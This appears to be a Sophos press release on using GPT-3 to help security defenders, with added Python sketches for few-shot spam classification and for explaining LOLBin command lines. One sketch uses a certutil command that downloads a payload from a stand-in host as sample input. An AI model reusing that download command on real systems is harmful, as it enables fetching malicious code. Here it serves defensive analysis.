Sophos, a global leader in innovating and delivering cybersecurity as a service, today released new research on how the cybersecurity industry can leverage GPT-3, the language model family behind OpenAI's now well-known ChatGPT, as a co-pilot to help defeat attackers.
The latest report, “Applying AI Language Processing to Cyber Defenses,” details projects developed by Sophos X-Ops using GPT-3’s large language models to simplify the search for malicious activity in datasets from security software, more accurately filter spam, and speed up analysis of “living off the land” binary (LOLBin) attacks.
“Since OpenAI unveiled ChatGPT back in November, the security community has largely focused on the potential risks this new technology could bring.
Can AI help wannabe attackers write malware or help cybercriminals write much more convincing phishing emails? Perhaps, but, at Sophos, we've long seen AI as an ally rather than an enemy for defenders, making it a cornerstone technology for Sophos, and GPT-3 is no different.
The security community should be paying attention not just to the potential risks, but the potential opportunities GPT-3 brings,” said Sean Gallagher, principal threat researcher, Sophos.
Sophos X-Ops researchers, including SophosAI Principal Data Scientist Younghoo Lee, have been working on three prototype projects that demonstrate the potential of GPT-3 as an assistant to cybersecurity defenders.
All three use a technique called “few-shot learning” to train the AI model with just a few data samples, reducing the need to collect a large volume of pre-classified data.
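To illustrate the idea, here is a minimal sketch of how a few-shot prompt for a GPT-3-style model might be assembled for one of the tasks mentioned above, spam filtering. The example messages, labels, and prompt wording are hypothetical illustrations, not Sophos's actual training data or prompts.

```python
# Hedged sketch: few-shot prompting for text classification.
# A handful of labelled samples are embedded directly in the prompt,
# so the model learns the task without a large pre-classified dataset.
# All examples below are invented for illustration.

FEW_SHOT_EXAMPLES = [
    ("Your account has been suspended, click here to verify.", "spam"),
    ("Attached are the meeting notes from Tuesday.", "ham"),
    ("You have won a $1,000 gift card! Claim now.", "spam"),
]

def build_few_shot_prompt(message: str) -> str:
    """Assemble a prompt that teaches the model the task from a few
    labelled samples, then asks it to classify a new message."""
    lines = ["Classify each email as 'spam' or 'ham'.", ""]
    for text, label in FEW_SHOT_EXAMPLES:
        lines.append(f"Email: {text}")
        lines.append(f"Label: {label}")
        lines.append("")  # blank line between samples
    lines.append(f"Email: {message}")
    lines.append("Label:")  # the model completes this line
    return "\n".join(lines)
```

The resulting string would be sent to a completion endpoint; the model's continuation of the final `Label:` line serves as the classification.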
Among these, Sophos researchers were able to create a program to simplify the process of reverse-engineering the command lines of LOLBins. Such reverse-engineering is notoriously difficult, but also critical for understanding LOLBins' behavior—and putting a stop to those types of attacks in the future.
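As a rough illustration of the kind of task involved, the sketch below builds a prompt asking a GPT-3-style model to explain an opaque LOLBin command line. The prompt wording is an assumption, not Sophos's actual implementation, and the `certutil` command shown is a widely documented download pattern used purely as an example.

```python
# Hedged sketch: asking a language model to translate a "living off the
# land" binary (LOLBin) command line into a plain-English explanation.
# The prompt text and example command are illustrative assumptions.

def build_lolbin_prompt(command_line: str) -> str:
    """Wrap a suspicious command line in an analysis request."""
    return (
        "You are a malware analyst. Explain, step by step, what the "
        "following Windows command line does and whether it is likely "
        "malicious:\n\n"
        f"{command_line}\n"
    )

# A well-known certutil misuse pattern (downloading a remote file),
# shown here only as sample input.
example_cmd = (
    "certutil.exe -urlcache -split -f "
    "http://example.com/payload.exe payload.exe"
)
prompt = build_lolbin_prompt(example_cmd)
```

In practice the model's response would give an analyst a fast first-pass summary, cutting down the manual reverse-engineering effort the passage describes.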
“One of the growing concerns within security operations centers is the sheer amount of ‘noise’ coming in. There are just too many notifications and detections to sort through, and many companies are dealing with limited resources.
We’ve proved that, with something like GPT-3, we can simplify certain labor-intensive processes and give back valuable time to defenders.
We are already working on incorporating some of the prototypes above into our products, and we’ve made the results of our efforts available on our GitHub for those interested in testing GPT-3 in their own analysis environments. In the future, we believe that GPT-3 may very well become a standard co-pilot for security experts,” said Gallagher.